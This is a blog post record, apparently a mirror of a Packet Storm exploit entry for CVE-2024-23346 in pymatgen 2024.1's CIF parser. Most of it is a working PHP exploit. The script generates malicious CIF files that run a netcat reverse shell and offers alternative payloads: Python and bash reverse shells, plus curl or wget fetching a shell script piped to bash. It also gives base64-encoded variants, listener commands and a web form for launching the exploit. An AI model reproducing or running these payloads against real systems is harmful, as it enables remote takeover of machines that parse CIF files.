{"id":41169,"date":"2026-02-17T12:46:14","date_gmt":"2026-02-17T12:46:14","guid":{"rendered":"http:\/\/localhost\/?p=41169"},"modified":"2026-02-17T12:46:14","modified_gmt":"2026-02-17T12:46:14","slug":"pymatgen-20241-cif-parser-reverse-shell","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41169","title":{"rendered":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742"},"content":{"rendered":"

{“lastseen”:”2026-02-17T18:12:44″,”description”:”Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File CIF parser that allows attackers to execute arbitrary Python code through specially crafted CIF files, leading to complete system…”,”published”:”2026-02-17T00:00:00″,”modified”:”2026-02-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell”,”source”:””,”references”:””,”id”:”PACKETSTORM:215742″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-23346″],”sourceData”:”=============================================================================================================================================\\n | # Title : Pymatgen 2024.1 CIF Parser Reverse Shell Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/pymatgen.org\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : \\n Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File (CIF) \\n \\t\\t\\t parser that allows attackers to execute arbitrary Python code through specially crafted CIF files, leading to complete system compromise.\\n \\t\\t\\t The vulnerability exists in the CIF parser’s handling of the _space_group_magn.transform_BNS_Pp_abc field, \\n \\t\\t\\t which improperly evaluates Python code embedded in CIF files without proper sanitization, allowing arbitrary code execution during file parsing.\\n \\t\\t\\t \\n [+] POC : \\n \\n php poc.php \\n \\n \\u003c?php\\n \\n class PymatgenRCEExploit {\\n \\n private $ip;\\n private $port;\\n private $malicious_file = ‘vuln.cif’;\\n \\n public function __construct($ip, $port) {\\n $this-\\u003eip = $ip;\\n $this-\\u003eport = $port;\\n }\\n \\n public function create_malicious_cif() {\\n $malicious_cif = \\u003c\\u003c\\u003cCIF\\n data_5yOhtAoR\\n _audit_creation_date 2024-11-13\\n _audit_creation_method \\”CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit\\”\\n \\n loop_\\n _parent_propagation_vector.id\\n _parent_propagation_vector.kxkykz\\n k1 [0 0 0]\\n \\n _space_group_magn.transform_BNS_Pp_abc ‘a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+[\\”__sub\\” + \\”classes__\\”]) () if d.__name__ == \\”BuiltinImporter\\”][0].load_module (\\”os\\”).system (\\”nc {$this-\\u003eip} {$this-\\u003eport} -e \/bin\/bash\\”);0,0,0’\\n \\n _space_group_magn.number_BNS 62.448\\n _space_group_magn.name_BNS \\”P n’ m a’ \\”\\n CIF;\\n \\n if (file_put_contents($this-\\u003emalicious_file, $malicious_cif)) {\\n echo \\”[+] Malicious CIF file created: {$this-\\u003emalicious_file}\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to create malicious CIF file\\\\n\\”;\\n return false;\\n }\\n }\\n \\n public function exploit() {\\n echo \\”[*] Starting Pymatgen RCE Exploit (CVE-2024-23346)\\\\n\\”;\\n echo \\”[*] Target: Pymatgen 2024.1\\\\n\\”;\\n echo \\”[*] Reverse Shell: {$this-\\u003eip}:{$this-\\u003eport}\\\\n\\”;\\n \\n if (!$this-\\u003ecreate_malicious_cif()) {\\n return false;\\n }\\n \\n if (!$this-\\u003echeck_dependencies()) {\\n return false;\\n }\\n \\n echo \\”[*] Triggering the exploit by parsing malicious CIF file…\\\\n\\”;\\n \\n $python_script = $this-\\u003egenerate_python_trigger();\\n $temp_python_file = ‘trigger_exploit_’ . bin2hex(random_bytes(4)) . ‘.py’;\\n \\n file_put_contents($temp_python_file, $python_script);\\n \\n $output = shell_exec(\\”python3 \\” . escapeshellarg($temp_python_file) . \\” 2\\u003e\\u00261\\”);\\n \\n unlink($temp_python_file);\\n if (file_exists($this-\\u003emalicious_file)) {\\n unlink($this-\\u003emalicious_file);\\n }\\n \\n echo \\”[*] Exploit triggered\\\\n\\”;\\n echo \\”[*] Check your listener for reverse shell connection\\\\n\\”;\\n \\n if (!empty($output)) {\\n echo \\”[*] Python output: \\” . trim($output) . \\”\\\\n\\”;\\n }\\n \\n return true;\\n }\\n \\n private function check_dependencies() {\\n echo \\”[*] Checking dependencies…\\\\n\\”;\\n \\n $python_check = shell_exec(\\”which python3 2\\u003e\/dev\/null\\”);\\n if (empty($python_check)) {\\n echo \\”[-] Python3 is not installed or not in PATH\\\\n\\”;\\n return false;\\n }\\n echo \\”[+] Python3 found: \\” . trim($python_check) . \\”\\\\n\\”;\\n \\n $pymatgen_check = shell_exec(\\”python3 -c ‘import pymatgen; print(pymatgen.__version__)’ 2\\u003e\/dev\/null\\”);\\n if (empty($pymatgen_check)) {\\n echo \\”[-] Pymatgen is not installed\\\\n\\”;\\n echo \\”[*] Attempting to install pymatgen…\\\\n\\”;\\n \\n $install_output = shell_exec(\\”pip3 install pymatgen==2024.1 2\\u003e\\u00261\\”);\\n if (strpos($install_output, ‘Successfully installed’) === false) {\\n echo \\”[-] Failed to install pymatgen\\\\n\\”;\\n return false;\\n }\\n echo \\”[+] Pymatgen installed successfully\\\\n\\”;\\n } else {\\n echo \\”[+] Pymatgen found: version \\” . trim($pymatgen_check) . \\”\\\\n\\”;\\n \\n if (version_compare(trim($pymatgen_check), ‘2024.1’, ‘==’)) {\\n echo \\”[+] Vulnerable version detected\\\\n\\”;\\n } else {\\n echo \\”[!] Different version detected: \\” . trim($pymatgen_check) . \\” – exploit may still work\\\\n\\”;\\n }\\n }\\n \\n return true;\\n }\\n \\n private function generate_python_trigger() {\\n return \\u003c\\u003c\\u003cPYTHON\\n import sys\\n import os\\n \\n try:\\n from pymatgen.io.cif import CifParser\\n \\n print(\\”[*] Attempting to parse malicious CIF file…\\”)\\n parser = CifParser(\\”{$this-\\u003emalicious_file}\\”)\\n structure = parser.parse_structures()\\n print(\\”[+] CIF file parsed successfully\\”)\\n \\n except Exception as e:\\n print(f\\”[-] Error during parsing: {{e}}\\”)\\n sys.exit(1)\\n \\n PYTHON;\\n }\\n \\n public function generate_listener_commands() {\\n echo \\”\\\\n[*] Setup listener using one of these commands:\\\\n\\”;\\n echo \\” nc -lvnp {$this-\\u003eport}\\\\n\\”;\\n echo \\” ncat -lvnp {$this-\\u003eport}\\\\n\\”;\\n echo \\” socat TCP-LISTEN:{$this-\\u003eport},reuseaddr,fork EXEC:\/bin\/bash\\\\n\\”;\\n }\\n }\\n \\n class PymatgenAlternativeExploits {\\n \\n public static function generate_different_payload($ip, $port, $payload_type = ‘reverse_shell’) {\\n $payloads = [\\n ‘reverse_shell’ =\\u003e \\”nc {$ip} {$port} -e \/bin\/bash\\”,\\n ‘python_reverse’ =\\u003e \\”python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{$ip}\\\\\\”,{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”])’\\”,\\n ‘bash_reverse’ =\\u003e \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$ip}\/{$port} 0\\u003e\\u00261\\”,\\n ‘curl_download’ =\\u003e \\”curl http:\/\/{$ip}:8000\/shell.sh | bash\\”,\\n ‘wget_download’ =\\u003e \\”wget -q -O – http:\/\/{$ip}:8000\/shell.sh | bash\\”\\n ];\\n \\n return $payloads[$payload_type] ?? $payloads[‘reverse_shell’];\\n }\\n \\n public static function create_advanced_malicious_cif($ip, $port, $payload_type = ‘reverse_shell’) {\\n $payload = self::generate_different_payload($ip, $port, $payload_type);\\n \\n $encoded_payload = base64_encode($payload);\\n $advanced_payload = \\”echo ‘{$encoded_payload}’ | base64 -d | bash\\”;\\n \\n $malicious_cif = \\u003c\\u003c\\u003cCIF\\n data_CVE_2024_23346\\n _audit_creation_date 2024-11-13\\n _audit_creation_method \\”Research Purpose Only\\”\\n \\n _space_group_magn.transform_BNS_Pp_abc ‘a,b,[d for d in ().__class__.__bases__[0].__subclasses__() if d.__name__ == \\”BuiltinImporter\\”][0].load_module(\\”os\\”).system(\\”{$advanced_payload}\\”);0,0,0’\\n \\n _space_group_magn.number_BNS 62.448\\n _space_group_magn.name_BNS \\”P n’ m a’ \\”\\n CIF;\\n \\n return $malicious_cif;\\n }\\n }\\n \\n class SimplePymatgenExploit {\\n \\n public static function quick_exploit($ip, $port) {\\n $cif_content = self::generate_malicious_cif($ip, $port);\\n $filename = ‘exploit_’ . bin2hex(random_bytes(4)) . ‘.cif’;\\n \\n file_put_contents($filename, $cif_content);\\n \\n $python_code = \\”\\n from pymatgen.io.cif import CifParser\\n try:\\n parser = CifParser(‘{$filename}’)\\n structures = parser.parse_structures()\\n print(‘Exploit triggered successfully’)\\n except Exception as e:\\n print(f’Error: {e}’)\\n \\”;\\n \\n $temp_py = ‘temp_exploit.py’;\\n file_put_contents($temp_py, $python_code);\\n \\n echo \\”[*] Executing exploit…\\\\n\\”;\\n system(\\”python3 {$temp_py}\\”);\\n \\n unlink($filename);\\n unlink($temp_py);\\n }\\n \\n private static function generate_malicious_cif($ip, $port) {\\n return \\u003c\\u003c\\u003cCIF\\n data_Exploit\\n _audit_creation_date 2024-11-13\\n \\n _space_group_magn.transform_BNS_Pp_abc ‘a,b,[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == \\”BuiltinImporter\\”][0].load_module(\\”os\\”).system(\\”nc {$ip} {$port} -e \/bin\/bash\\”);0,0,0’\\n CIF;\\n }\\n }\\n \\n if (php_sapi_name() === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n \\n if ($argc \\u003c 3) {\\n echo \\”Pymatgen 2024.1 Remote Code Execution (CVE-2024-23346)\\\\n\\”;\\n echo \\”======================================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003cLHOST\\u003e \\u003cLPORT\\u003e\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100 4444\\\\n\\”;\\n echo \\”\\\\nAdditional options (environment variables):\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=reverse_shell|python_reverse|bash_reverse\\\\n\\”;\\n echo \\”QUICK_MODE=true\\\\n\\”;\\n exit(1);\\n }\\n \\n $lhost = $argv[1];\\n $lport = $argv[2];\\n $payload_type = getenv(‘PAYLOAD_TYPE’) ?: ‘reverse_shell’;\\n $quick_mode = getenv(‘QUICK_MODE’) === ‘true’;\\n \\n try {\\n if ($quick_mode) {\\n echo \\”[*] Running in quick mode…\\\\n\\”;\\n SimplePymatgenExploit::quick_exploit($lhost, $lport);\\n } else {\\n $exploit = new PymatgenRCEExploit($lhost, $lport);\\n \\n if ($exploit-\\u003eexploit()) {\\n $exploit-\\u003egenerate_listener_commands();\\n }\\n }\\n \\n echo \\”\\\\n[*] Note: This exploit targets CVE-2024-23346 in Pymatgen 2024.1\\\\n\\”;\\n echo \\”[*] The vulnerability is in the CIF parser’s handling of malicious input\\\\n\\”;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploit failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n if (isset($_GET[‘web’]) \\u0026\\u0026 $_GET[‘web’] === ‘true’) {\\n header(‘Content-Type: text\/html; charset=utf-8’);\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003ePymatgen RCE Exploit (CVE-2024-23346)\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 40px; }\\n .container { max-width: 800px; margin: 0 auto; }\\n .form-group { margin: 15px 0; }\\n label { display: block; margin-bottom: 5px; }\\n input, select { padding: 8px; width: 200px; }\\n button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; }\\n .output { background: #f4f4f4; padding: 15px; margin: 15px 0; white-space: pre-wrap; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003ePymatgen RCE Exploit (CVE-2024-23346)\\u003c\/h1\\u003e\\n \\n \\u003c?php\\n if ($_POST[‘exploit’] ?? false) {\\n $ip = $_POST[‘ip’] ?? ”;\\n $port = $_POST[‘port’] ?? ”;\\n $payload_type = $_POST[‘payload_type’] ?? ‘reverse_shell’;\\n \\n if (!empty($ip) \\u0026\\u0026 !empty($port)) {\\n echo \\”\\u003cdiv class=’output’\\u003e\\”;\\n try {\\n $exploit = new PymatgenRCEExploit($ip, $port);\\n $exploit-\\u003eexploit();\\n $exploit-\\u003egenerate_listener_commands();\\n } catch (Exception $e) {\\n echo \\”Error: \\” . $e-\\u003egetMessage();\\n }\\n echo \\”\\u003c\/div\\u003e\\”;\\n }\\n }\\n ?\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”exploit\\” value=\\”true\\”\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003eYour IP Address:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” name=\\”ip\\” value=\\”\\u003c?= $_SERVER[‘REMOTE_ADDR’] ?? ” ?\\u003e\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003eListener Port:\\u003c\/label\\u003e\\n \\u003cinput type=\\”number\\” name=\\”port\\” value=\\”4444\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eNetcat Reverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”python_reverse\\”\\u003ePython Reverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”bash_reverse\\”\\u003eBash Reverse Shell\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv style=\\”margin-top: 30px; font-size: 0.9em; color: #666;\\”\\u003e\\n \\u003cstrong\\u003eNote:\\u003c\/strong\\u003e This exploit requires pymatgen 2024.1 to be installed on the target system.\\n The vulnerability allows remote code execution through malicious CIF file parsing.\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\u003c?php\\n exit;\\n }\\n \\n ?\\u003e\\n \\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215742″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215742\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-17T18:12:44″,”description”:”Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File CIF parser that allows attackers to execute arbitrary Python code…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-41169","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41169\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-17T18:12:44″,”description”:”Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File CIF parser that allows attackers to execute arbitrary Python code...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41169\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-17T12:46:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742\",\"datePublished\":\"2026-02-17T12:46:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169\"},\"wordCount\":2093,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41169#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169\",\"name\":\"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-17T12:46:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41169\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41169#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41169","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem","og_description":"{“lastseen”:”2026-02-17T18:12:44″,”description”:”Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File CIF parser that allows attackers to execute arbitrary Python code...","og_url":"https:\/\/zero.redgem.net\/?p=41169","og_site_name":"zero redgem","article_published_time":"2026-02-17T12:46:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41169#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41169"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742","datePublished":"2026-02-17T12:46:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41169"},"wordCount":2093,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41169#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41169","url":"https:\/\/zero.redgem.net\/?p=41169","name":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-17T12:46:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41169#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41169"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41169#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Pymatgen 2024.1 CIF Parser Reverse Shell_PACKETSTORM:215742"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41169"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41169\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}